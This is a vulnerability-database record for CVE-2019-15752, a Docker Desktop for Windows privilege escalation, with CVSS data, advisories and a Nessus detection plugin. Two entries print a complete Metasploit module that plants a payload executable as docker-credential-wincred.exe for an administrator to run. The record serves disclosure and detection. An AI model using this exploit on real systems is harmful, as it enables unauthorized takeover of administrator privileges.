Description
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\DockerDesktop\version-bin\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.
Affected Software
Related
{"id": "CVE-2019-15752", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2019-15752", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "published": "2019-08-28T21:15:00", "modified": "2020-08-31T14:15:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15752", "reporter": "cve@mitre.org", "references": ["https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e", "http://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"], "cvelist": ["CVE-2019-15752"], "immutableFields": [], "lastseen": "2022-03-23T21:04:31", "viewCount": 808, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:A1ACCD5B-C89E-4392-86ED-6C3DDC73AB47"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-15752"]}, {"type": "nessus", "idList": ["DOCKER_FOR_WINDOWS_CVE-2019-15752.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157404"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-15752"]}, {"type": "zdt", "idList": ["1337DAY-ID-34319"]}]}, "score": {"value": 4.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-15752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/DOCKER_CREDENTIAL_WINCRED"]}, {"type": "nessus", "idList": ["DOCKER_FOR_WINDOWS_CVE-2019-15752.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157404"]}, {"type": "zdt", "idList": ["1337DAY-ID-34319"]}]}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-15752"]}]}, "affected_software": {"major_version": [{"name": "docker", "version": 2}]}, "vulnersScore": 4.9}, "_state": {"dependencies": 1660004461, "score": 1659871106, "cisa_kev_wildexploited": 1660152412, "affected_software_major_version": 1671582767}, "_internal": {"score_hash": "06de72aaca98192627c3227ad177972f"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-732"], "affectedSoftware": [{"cpeName": "docker:docker", "version": "2.1.0.1", "operator": "lt", "name": "docker"}], "affectedConfiguration": [{"name": "microsoft windows", "cpeName": "microsoft:windows", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:docker:docker:2.1.0.1:*:*:*:community:*:*:*", "versionEndExcluding": "2.1.0.1", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e", "name": "https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "name": "http://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "refsource": "MISC", "tags": []}, {"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", "name": "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", "refsource": "MLIST", "tags": []}]}
{"ubuntucve": [{"lastseen": "2022-08-04T13:37:42", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain\nprivileges by placing a Trojan horse docker-credential-wincred.exe file in\n%PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then\nwaiting for an admin or service user to authenticate with Docker, restart\nDocker, or run 'docker login' to force the command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-08-28T00:00:00", "type": "ubuntucve", "title": "CVE-2019-15752", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2019-08-28T00:00:00", "id": "UB:CVE-2019-15752", "href": "https://ubuntu.com/security/CVE-2019-15752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-01-20T17:07:46", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run \u2018docker login\u2019 to force the command.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-08-28T00:00:00", "type": "attackerkb", "title": "CVE-2019-15752", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2020-08-31T00:00:00", "id": "AKB:A1ACCD5B-C89E-4392-86ED-6C3DDC73AB47", "href": "https://attackerkb.com/topics/tIppilcgdb/cve-2019-15752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-20T19:42:31", "description": "This Metasploit module exploit leverages a vulnerability in Docker Desktop Community Edition versions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-27T00:00:00", "type": "zdt", "title": "Docker Desktop Community Edition <= 2.1.0.1 Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2020-04-27T00:00:00", "id": "1337DAY-ID-34319", "href": "https://0day.today/exploit/description/34319", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Post::Windows::Priv\n include Post::Windows::Runas\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',\n 'Description' => %q{\n This exploit leverages a vulnerability in docker desktop\n community editions prior to 2.1.0.1 where an attacker can write\n a payload to a lower-privileged area to be executed\n automatically by the docker user at login.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Morgan Roman', # discovery\n 'bwatters-r7', # metasploit module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [[ 'Automatic', {} ]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'WfsDelay' => 15\n },\n 'DisclosureDate' => '2019-07-05',\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2019-15752'],\n ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']\n ]\n )\n )\n register_options(\n [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]\n )\n end\n\n def docker_version\n output = cmd_exec('cmd.exe', '/c docker -v')\n vprint_status(output)\n version_string = output.match(/(\\d+\\.)(\\d+\\.)(\\d)/)[0]\n Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))\n end\n\n def check\n if docker_version <= Gem::Version.new('18.09.0')\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n check_permissions!\n case get_uac_level\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\n fail_with(Failure::NotVulnerable,\n \"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\")\n when UAC_DEFAULT\n print_good('UAC is set to Default')\n print_good('BypassUAC can bypass this setting, continuing...')\n when UAC_NO_PROMPT\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\n shell_execute_exe\n return\n end\n\n # make payload\n docker_path = expand_path(\"#{datastore['PROGRAMDATA']}\\\\DockerDesktop\\\\version-bin\")\n fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)\n payload_name = 'docker-credential-wincred.exe'\n payload_pathname = \"#{docker_path}\\\\#{payload_name}\"\n vprint_status('Making Payload')\n payload = generate_payload_exe\n\n # upload Payload\n vprint_status(\"Uploading Payload to #{payload_pathname}\")\n write_file(payload_pathname, payload)\n vprint_status('Payload Upload Complete')\n print_status('Waiting for user to attempt to login')\n end\n\n def check_permissions!\n unless check == Exploit::CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?\n # Check if you are an admin\n # is_in_admin_group can be nil, true, or false\n end\nend\n", "sourceHref": "https://0day.today/exploit/34319", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Docker Desktop Community Edition Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-15752", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-04-27T23:20:27", "description": "", "cvss3": {}, "published": "2020-04-27T00:00:00", "type": "packetstorm", "title": "Docker-Credential-Wincred.exe Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15752"], "modified": "2020-04-27T00:00:00", "id": "PACKETSTORM:157404", "href": "https://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Post::Windows::Priv \ninclude Post::Windows::Runas \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation', \n'Description' => %q{ \nThis exploit leverages a vulnerability in docker desktop \ncommunity editions prior to 2.1.0.1 where an attacker can write \na payload to a lower-privileged area to be executed \nautomatically by the docker user at login. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Morgan Roman', # discovery \n'bwatters-r7', # metasploit module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Targets' => [[ 'Automatic', {} ]], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'WfsDelay' => 15 \n}, \n'DisclosureDate' => '2019-07-05', \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ] \n}, \n'References' => [ \n['CVE', '2019-15752'], \n['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e'] \n] \n) \n) \nregister_options( \n[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])] \n) \nend \n \ndef docker_version \noutput = cmd_exec('cmd.exe', '/c docker -v') \nvprint_status(output) \nversion_string = output.match(/(\\d+\\.)(\\d+\\.)(\\d)/)[0] \nGem::Version.new(version_string.split('.').map(&:to_i).join('.')) \nend \n \ndef check \nif docker_version <= Gem::Version.new('18.09.0') \nreturn CheckCode::Appears \nend \n \nCheckCode::Safe \nend \n \ndef exploit \ncheck_permissions! \ncase get_uac_level \nwhen UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, \nUAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, \nUAC_PROMPT_CREDS, UAC_PROMPT_CONSENT \nfail_with(Failure::NotVulnerable, \n\"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\") \nwhen UAC_DEFAULT \nprint_good('UAC is set to Default') \nprint_good('BypassUAC can bypass this setting, continuing...') \nwhen UAC_NO_PROMPT \nprint_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead') \nshell_execute_exe \nreturn \nend \n \n# make payload \ndocker_path = expand_path(\"#{datastore['PROGRAMDATA']}\\\\DockerDesktop\\\\version-bin\") \nfail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path) \npayload_name = 'docker-credential-wincred.exe' \npayload_pathname = \"#{docker_path}\\\\#{payload_name}\" \nvprint_status('Making Payload') \npayload = generate_payload_exe \n \n# upload Payload \nvprint_status(\"Uploading Payload to #{payload_pathname}\") \nwrite_file(payload_pathname, payload) \nvprint_status('Payload Upload Complete') \nprint_status('Waiting for user to attempt to login') \nend \n \ndef check_permissions! \nunless check == Exploit::CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable.') \nend \nfail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? \n# Check if you are an admin \n# is_in_admin_group can be nil, true, or false \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157404/docker_credential_wincred.rb.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:58:08", "description": "The version of Docker Desktop for Windows is prior to 2.1.0.1. Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-15T00:00:00", "type": "nessus", "title": "Docker Desktop < 2.1.0.1 Privilege Escalation", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2022-01-20T00:00:00", "cpe": ["cpe:/a:docker:docker"], "id": "DOCKER_FOR_WINDOWS_CVE-2019-15752.NASL", "href": "https://www.tenable.com/plugins/nessus/155350", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155350);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2019-15752\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Docker Desktop < 2.1.0.1 Privilege Escalation\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application installed that is affected by a privilege escalation vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Docker Desktop for Windows is prior to 2.1.0.1. Docker Desktop Community Edition before 2.1.0.1 allows\nlocal users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in\n%PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to\nauthenticate with Docker, restart Docker, or run 'docker login' to force the command.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c485c1e\");\n # https://docs.docker.com/desktop/windows/release-notes/2.x/#docker-desktop-community-2101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbafae3b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Docker Desktop version 2.1.0.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15752\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Docker-Credential-Wincred.exe Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:docker:docker\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"docker_for_windows_installed.nbin\");\n script_require_keys(\"installed_sw/Docker for Windows\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Docker for Windows', win_local:TRUE);\n\nvar constraints = [{'fixed_version':'2.1.0.1'}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-01-24T06:04:44", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-08-28T21:15:00", "type": "debiancve", "title": "CVE-2019-15752", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2019-08-28T21:15:00", "id": "DEBIANCVE:CVE-2019-15752", "href": "https://security-tracker.debian.org/tracker/CVE-2019-15752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}